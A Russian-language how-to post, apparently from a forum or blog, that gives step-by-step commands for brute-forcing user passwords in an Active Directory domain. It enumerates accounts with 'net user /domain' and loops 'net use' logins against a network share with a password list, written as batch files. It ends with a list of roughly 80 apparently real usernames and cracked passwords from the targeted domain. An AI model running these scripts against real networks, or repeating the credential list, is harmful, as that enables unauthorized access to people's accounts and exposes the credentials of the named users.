Это моя первая статья , прошу не ругать. В этой статье приведу пример брутфорса паролей обычных пользователей в домене, построенном на Active Directory (Windows Server 2003). Весь материал практический и проверен на приведённом примере. 1.Получаем в консоли список пользователей AD : cmd> net user /domain >> username.txt 2.Получился файл username.txt вида : __vmware_user__ aaii ababkovaeg abaevalu abashevaia abdrahimovalm abdrahimovaod abdrakhmanovadr abdrakhmanovaik abdrakhmanovds abdulinalr abdulinma abdulkarimovavk abdullinaa abdullinagr abdullinalr abdullinayur abdullinma abdulmanovpsh abdulovasv abdulovavb 3.Сделаем для простоты файл user.txt c именами пользователей в 1 столбик: 1)создадим Bat-файл parser.bat : @for /f "tokens=1,2,3*" %%i in (username.txt) do (@echo %%i >>user.txt)&(@echo %%j >>user.txt)&(@echo %%k >> user.txt) 2) запускаем и ждём окончания. 4.Создаем файл паролей pass.txt с паролями в 1 столбик по одному,например : 11111111 12345678 5.Создаём Bat-файл brut.bat : for /f %%i in (user.txt) do for /f %%j in (pass.txt) do (net use r: \\w300\foto %%j /user:****.ru\%%i /persistent:yes)&&(echo %%i;%%j>>success.txt)&&(net use r: /delete) P.S: r: -временный несуществующий диск \\w300\foto - любая существующая сетевая папка ****.ru - домен с AD 6. Запускаем brut.bat и ждём 7. По окончанию получен файл success.txt вида логин;пароль : ahatovms;12345678 alehinasyu;11111111 batueveev;11111111 bikbulatovala;11111111 bochkovae;12345678 bogdanovama;12345678 bondarenkolp;11111111 boss;12345678 chudinoven;11111111 dyadkovatv;11111111 efremovas;12345678 gafurivann;11111111 gunbinana;12345678 ifepo;11111111 ifepoe;11111111 izjurovaa;12345678 jkmuf;11111111 kashiginaas;11111111 konovalovana;11111111 konyaevaea;12345678 korgakovasv;12345678 kostarevaam;11111111 kosyyie;12345678 kozevnikovald;11111111 kuksovalv;11111111 kursi;11111111 labeikinas;12345678 litkesg;11111111 lupanovaiv;11111111 lyashenkoyuv;11111111 martynovakju;12345678 maryaninovna;11111111 matrosds;11111111 mosienkomu;12345678 moskalenkooa;12345678 mudrakln;11111111 nikonovadr;12345678 ntuser;11111111 ognevayamm;11111111 olimpinf;11111111 omarovaka;12345678 paryshevaae;12345678 pesinla;11111111 pivchenkoea;12345678 plotnikovaev2;aaaaaaaa poletaevsn;12345678 popovsm;12345678 portnovab;11111111 pozdnyakovaep;12345678 pozhnikovaas;12345678 pu-85;11111111 pyatnitskiyas;11111111 ReslerLA;12345678 safronovas;11111111 shankovskihea;11111111 shaysultanovaoa;11111111 shefersv;11111111 shhukinaia;12345678 shkiravp;12345678 shvarevaia;11111111 sibagatulinnaai;12345678 stafeevams;11111111 tatarinovam;11111111 team3;11111111 tolkachevaev;11111111 trenkleee;11111111 troyanoviv;12345678 turovecgv;12345678 u1;11111111 u2;11111111 u4;11111111 u5;11111111 uit_pochta;11111111 volozeninanb;11111111 yashinama;12345678 zaharovavm;11111111 8.Чтобы просмотреть права пользователя вводим : cmd> net user имя_пользователя@****.ru // или ваш домен Спасибо за внимание!